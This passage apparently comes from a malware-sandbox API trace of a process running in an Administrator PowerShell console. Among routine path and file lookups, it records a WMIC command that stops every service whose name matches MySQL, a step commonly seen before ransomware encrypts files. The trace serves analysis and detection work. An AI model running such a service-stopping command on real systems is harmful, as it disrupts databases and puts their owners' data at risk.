lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0287.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0287.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0287.086] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0287.086] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0287.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0287.086] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0287.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0287.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0287.086] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0287.086] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0287.087] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0287.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0287.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0287.087] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0287.087] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0287.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0287.087] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0287.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0287.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0287.088] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0287.088] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0287.088] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0287.088] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0287.088] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0287.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0287.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0287.089] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0287.349] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.349] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.349] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.350] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0287.351] GetConsoleWindow () returned 0x302b8 [0287.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0287.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0287.356] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0287.356] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0287.357] CoTaskMemFree (pv=0x7e29450) [0287.357] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c339d8 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice", lpProcessInformation=0x4c339d8*(hProcess=0xa0c, hThread=0xa08, dwProcessId=0x1284, dwThreadId=0x11d8)) returned 1 [0287.374] CloseHandle (hObject=0xa08) returned 1 [0287.375] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0287.375] GetCurrentProcess () returned 0xffffffff [0287.376] GetCurrentProcess () returned 0xffffffff [0287.376] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xa0c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xa08) returned 1 [0287.376] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xa08, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0289.693] CloseHandle (hObject=0xa08) returned 1 [0289.694] GetExitCodeProcess (in: hProcess=0xa0c, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0289.694] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0289.711] CloseHandle (hObject=0xa0c) returned 1 [0289.712] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.713] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.713] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.713] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.713] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.713] SetEvent (hEvent=0xa70) returned 1 [0289.713] SetEvent (hEvent=0xa64) returned 1 [0289.713] SetEvent (hEvent=0xa68) returned 1 [0289.713] SetEvent (hEvent=0xa6c) returned 1 [0289.713] SetEvent (hEvent=0xa80) returned 1 [0289.714] SetEvent (hEvent=0xa74) returned 1 [0289.714] SetEvent (hEvent=0xa78) returned 1 [0289.714] SetEvent (hEvent=0xa7c) returned 1 [0289.714] SetEvent (hEvent=0xa88) returned 1 [0289.714] SetEvent (hEvent=0xa84) returned 1 [0289.715] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0289.721] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0289.723] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xe8502fc0, Data2=0x722c, Data3=0x46ad, Data4=([0]=0xa4, [1]=0x8f, [2]=0x9, [3]=0x3e, [4]=0x41, [5]=0x7b, [6]=0x57, [7]=0xb3))) returned 0x0 [0289.724] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=38475823146) returned 1 [0289.724] AmsiOpenSession () returned 0x0 [0289.724] AmsiScanString () returned 0x80070015 [0289.734] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=38476894718) returned 1 [0289.734] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x75, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.735] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x76, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0289.736] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0289.736] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0289.736] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0289.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0289.738] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0289.738] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0289.738] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0289.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0289.738] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0289.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0289.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0289.739] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0289.739] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0289.739] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0289.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0289.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0289.740] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0289.740] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0289.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0289.740] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0289.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0289.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0289.741] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0289.741] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0289.741] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0289.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0289.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0289.742] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0289.742] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0289.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0289.742] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0289.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0289.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0289.742] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0289.742] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0289.742] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0289.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0289.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0289.743] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0289.743] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0289.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0289.743] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), 